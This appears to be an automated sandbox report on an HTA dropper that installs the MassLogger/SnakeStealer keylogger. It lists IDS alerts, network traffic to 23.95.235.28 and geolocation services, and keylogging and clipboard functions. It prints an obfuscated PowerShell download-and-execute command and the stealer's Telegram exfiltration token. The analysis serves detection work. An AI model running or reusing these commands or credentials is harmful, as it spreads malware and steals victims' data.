C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7560, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline", ProcessId: 4064, ProcessName: csc.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-17T01:19:04.147044+010020220501A Network Trojan was detected23.95.235.2880192.168.2.449724TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-17T01:19:04.240021+010020220511A Network Trojan was detected23.95.235.2880192.168.2.449724TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-17T01:19:11.071326+010028032742Potentially Bad Traffic192.168.2.449725193.122.130.080TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\csoss.exeAvira: detection malicious, Label: TR/AD.SnakeStealer.ergur
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exeAvira: detection malicious, Label: TR/AD.SnakeStealer.ergur
                    Found malware configuration
                    Source: 00000007.00000002.2506031760.00000000021E1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exeReversingLabs: Detection: 83%
                    Source: C:\Users\user\AppData\Roaming\csoss.exeReversingLabs: Detection: 83%
                    Multi AV Scanner detection for submitted file
                    Source: needagoodplanforsuccesstogetbackbest.htaVirustotal: Detection: 46%Perma Link
                    Source: needagoodplanforsuccesstogetbackbest.htaReversingLabs: Detection: 27%
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49726 version: TLS 1.0
                    Source: Binary string: wntdll.pdbUGP source: csoss.exe, 00000006.00000003.1392226425.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1386036153.0000000003F30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: csoss.exe, 00000006.00000003.1392226425.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1386036153.0000000003F30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: q7C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.pdb source: powershell.exe, 00000003.00000002.1394587679.00000000050BD000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_0021445A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021C6D1 FindFirstFileW,FindClose,6_2_0021C6D1
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_0021C75C
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0021EF95
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0021F0F2
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0021F3F3
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_002137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_002137EF
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00213B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00213B12
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0021BCBC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04705782h7_2_04705367
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 047051B9h7_2_04704F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04705782h7_2_047056AF

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 23.95.235.28:80 -> 192.168.2.4:49724
                    Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 23.95.235.28:80 -> 192.168.2.4:49724
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 17 Mar 2025 00:19:03 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 13 Mar 2025 12:29:25 GMTETag: "ef800-6303878f4d6d6"Accept-Ranges: bytesContent-Length: 980992Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 79 cf d2 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 16 06 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0f 00 00 04 00 00 b6 19 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 00 6f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 6f 02 00 00 70 0c 00 00 70 02 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 e0 0e 00 00 72 00 00 00 86 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 23.95.235.28 23.95.235.28
                    Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                    Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49725 -> 193.122.130.0:80
                    Source: global trafficHTTP traffic detected: GET /110/csoss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.28Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49726 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04767A18 URLDownloadToFileW,3_2_04767A18
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /110/csoss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.28Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: powershell.exe, 00000003.00000002.1394587679.00000000050BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/110/csoss.ex
                    Source: powershell.exe, 00000003.00000002.1394587679.00000000050BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/110/csoss.exe
                    Source: powershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/110/csoss.exe$
                    Source: powershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/110/csoss.exev
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com0nu
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.000000000224E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.00000000021E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                    Source: csoss.exe, 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                    Source: powershell.exe, 00000003.00000002.1398726052.0000000007300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                    Source: powershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: powershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1393474414.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.000000000227D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.000000000227D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.00000000021E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1393474414.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: csoss.exe, 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                    Source: powershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1393474414.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.1393474414.0000000002D26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
                    Source: powershell.exe, 00000003.00000002.1398906422.00000000073A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/
                    Source: powershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: csoss.exe, 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00224164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00224164
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00224164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00224164
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00223F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_00223F66
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0021001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,6_2_0021001C
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_0023CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_0023CABC

                    System Summary

                    barindex
                    Detected Cobalt Strike Beacon
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"
